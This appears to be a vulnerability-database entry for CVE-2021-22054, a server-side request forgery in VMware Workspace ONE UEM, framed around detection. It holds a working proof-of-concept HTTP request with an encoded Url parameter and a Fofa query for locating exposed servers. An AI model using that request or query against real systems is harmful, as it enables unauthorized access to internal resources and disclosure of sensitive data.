🔙 목록으로 돌아가기

CVE-2021-22054: VMWare Workspace ONE UEM - Server-Side Request Forgery

TitleVMWare Workspace ONE UEM - Server-Side Request Forgery
Authorh1ei1
SeverityHigh
ImpactAn attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
RemediationApply the necessary patches or updates provided by VMWare to fix the vulnerability.
CVSS Score7.5
EPSS Score0.84417
CVE IDCVE-2021-22054
CWE IDCWE-918
Fofa Querybanner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx"banner="/airwatch/default.aspx" || header="/airwatch/default.aspx"
Tags cve2021 cve vmware workspace ssrf vkev vuln

🔍 Vulnerability Description

VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.

🌐 HTTP Request

GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-22054.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-22054.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A